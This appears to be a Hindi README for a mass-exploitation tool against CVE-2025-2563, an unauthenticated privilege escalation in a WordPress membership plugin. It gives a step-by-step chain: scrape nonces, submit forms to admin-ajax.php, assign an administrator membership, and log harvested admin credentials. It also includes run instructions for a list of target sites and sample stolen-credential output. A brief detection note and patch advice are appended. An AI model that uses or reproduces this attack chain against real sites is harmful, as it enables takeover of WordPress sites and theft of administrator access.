
CVE-2025-2563 के लिए मल्टी-थ्रेडेड एक्सप्लॉइट, जो वर्डप्रेस User Registration & Membership प्लगइन में अप्रमाणित विशेषाधिकार वृद्धि को लक्षित करता है। अनाम पंजीकरण, नॉनस दुरुपयोग और प्रशासक भूमिका अधिग्रहण को स्वचालित करता है।
██╗ ██╗███████╗███████╗██████╗ ██████╗ ███████╗ ██████╗ ██║ ██║██╔════╝██╔════╝██╔══██╗ ██╔══██╗██╔════╝██╔════╝ ██║ ██║███████╗█████╗ ██████╔╝ ██████╔╝█████╗ ██║ ███╗ ██║ ██║╚════██║██╔══╝ ██╔══██╗ ██╔══██╗██╔══╝ ██║ ██║ ╚██████╔╝███████║███████╗██║ ██║ ██║ ██║███████╗╚██████╔╝ ╚═════╝ ╚══════╝╚══════╝╚═╝ ╚═╝ ╚═╝ ╚═╝╚══════╝ ╚═════╝
CVE-2025-2563 — WordPress के लिए उपयोगकर्ता पंजीकरण और सदस्यता प्लगइन के माध्यम से अप्रमाणित विशेषाधिकार उन्नयन। पूर्ण-श्रृंखला शोषण: अज्ञात पंजीकरण → सदस्यता nonce का दुरुपयोग → व्यवस्थापक भूमिका अधिग्रहण।
| क्षेत्र | विवरण |
|---|---|
| CVE | CVE-2025-2563 |
| प्लगइन | उपयोगकर्ता पंजीकरण और सदस्यता |
| प्रभावित संस्करण | ≤ 4.1.1 |
| प्रकार | अप्रमाणित विशेषाधिकार उन्नयन |
| CVSS | गंभीर |
| वेक्टर | नेटवर्क / कोई प्रमाणीकरण आवश्यक नहीं |
| WordPress | प्लगइन चलाने वाला कोई भी संस्करण |
[1] Crawl target
↓
[2] Fetch /membership-pricing/ & /membership-registration/
↓
[3] Extract form_id, membership_id, security nonce, ur_frontend_form_nonce
↓
[4] POST to /wp-admin/admin-ajax.php
action=user_registration_user_form_submit
→ Create arbitrary user account (unauthenticated)
↓
[5] Abuse membership JS nonce via ur_membership_frontend_localized_data
→ Assign administrator-level membership plan to new account
↓
[6] Verify admin access at /wp-admin/users.php & /wp-admin/plugin-install.php
↓
[7] Save credentials → NATA_admin.txt
form_id × membership_id × nonce संयोजनों को आज़माता हैwp-admin पहुंच की पुष्टि करता हैNATA_admin.txt में, पंजीकरण reg.txt में सहेजे जाते हैंpip install requests rich
# 1. Add targets to list.txt (one URL per line)
# 2. Run
python CVE-2025-2563.py
इनपुट: list.txt
https://target1.com
https://target2.com
https://target3.com
आउटपुट: NATA_admin.txt
[2025-04-20 08:00:00] https://target.com/wp-login.php user:natxploit_abc pass:NATA_adminSA
| फ़ाइल | सामग्री |
|---|---|
NATA_admin.txt | पुष्टि किए गए व्यवस्थापक क्रेडेंशियल्स |
reg.txt | सभी सफल पंजीकरण |
निम्नलिखित पर नज़र रखें:
/wp-admin/admin-ajax.php पर action=user_registration_user_form_submit के साथ बार-बार POST/membership-registration/ के अनुरोध के तुरंत बाद AJAX सदस्यता असाइनमेंटपैच: उपयोगकर्ता पंजीकरण और सदस्यता प्लगइन को संस्करण >= 4.1.2 में अपडेट करें
यह उपकरण केवल अधिकृत प्रवेश परीक्षण और सुरक्षा अनुसंधान के लिए जारी किया गया है। लेखक दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेता है। परीक्षण से पहले हमेशा स्पष्ट लिखित अनुमति प्राप्त करें।
Natan Utama — github.com/dokter69 | Telegram: @ayasyanaro